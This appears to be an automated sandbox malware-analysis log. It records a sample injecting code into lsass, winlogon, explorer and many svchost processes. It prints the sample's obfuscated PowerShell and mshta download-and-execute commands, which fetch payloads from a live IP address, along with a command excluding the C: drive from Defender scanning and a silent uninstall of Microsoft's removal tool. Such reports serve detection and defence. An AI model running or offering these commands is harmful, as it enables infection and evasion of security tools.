              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20D6ED80000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24618740000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2495FDB0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17DD92C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26473470000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23F13F00000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205ECFC0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C2AEBD0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26878460000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1DCAFC10000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22464430000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E4DACB0000 value starts with: 4D5A
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Windows\System32\dialer.exeMemory written: PID: 4004 base: 2D40000 value: 4D
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\AppData\Roaming\LB31.exeThread register set: target process: 2748
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Roaming\LB31.exeMemory written: C:\Windows\System32\dialer.exe base: 140001000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B010000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6950000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA800000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC30000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2DA0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 2D40000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A7000000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20D6ED80000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 24618740000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2495FDB0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17DD92C0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26473470000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23F13F00000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205ECFC0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C2AEBD0000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26878460000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1DCAFC10000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22464430000
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E4DACB0000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 224637C0000
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 224637D0000
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wscript.exe "wscript" C:\Users\user\AppData\Local\Temp\tempScript.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-UpdateJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://176.113.115.178/Windows-UpdateJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB31.exe "C:\Users\user\AppData\Roaming\LB31.exe"
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://176.113.115.178/ff/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://176.113.115.178/ff/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://176.113.115.178/ff/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://176.113.115.178/ff/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://176.113.115.178/ff/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://176.113.115.178/ff/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,49_2_0000000140001B54
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,49_2_0000000140001B54
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCAFC236F0 cpuid 16_2_000001DCAFC236F0
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
